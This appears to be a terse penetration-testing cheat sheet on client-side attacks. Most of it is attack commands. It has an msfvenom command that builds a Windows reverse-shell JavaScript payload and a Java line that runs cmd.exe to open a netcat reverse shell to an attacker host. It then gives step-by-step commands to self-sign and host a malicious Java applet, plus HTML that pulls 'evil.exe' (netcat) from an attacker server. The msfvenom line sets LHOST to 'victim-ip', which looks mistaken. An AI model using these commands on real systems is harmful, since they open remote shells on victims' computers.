Client side attacks

Goals

• To attack from client-side application.

JavaScript payload

Unicode javascript payload

• msfvenom -p windows/shell_reverse_tcp LHOST=victim-ip LPORT=443 -f js_le -e generic/none

Java Applet

Run reverse shell from Java

• f = Runtime.getRuntime().exec("cmd.exe /c " + expath + " attacker_ip attacker_listen_port -e cmd.exe");

Compile Java appliet

• May need to use applicable Java: /usr/lib/jvm/java-8-openjdk-i386/bin/
• javac -source 1.7 -target 1.7 Java.java

Add permission

• echo “Permissions: all-permissions” > /root/manifest.txt

Create jar file

• jar cvf Java.jar Java.class

Sign Java Applet

• keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123
• jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet

Copy Java Applet to web server

• cp Java.class SignedJava.jar /var/www/html/

Create html file with embedded Java applet

• echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://attacker-ip:80/evil.exe"></applet>' > /var/www/html/java.html
• evil.exe can be nc.exe.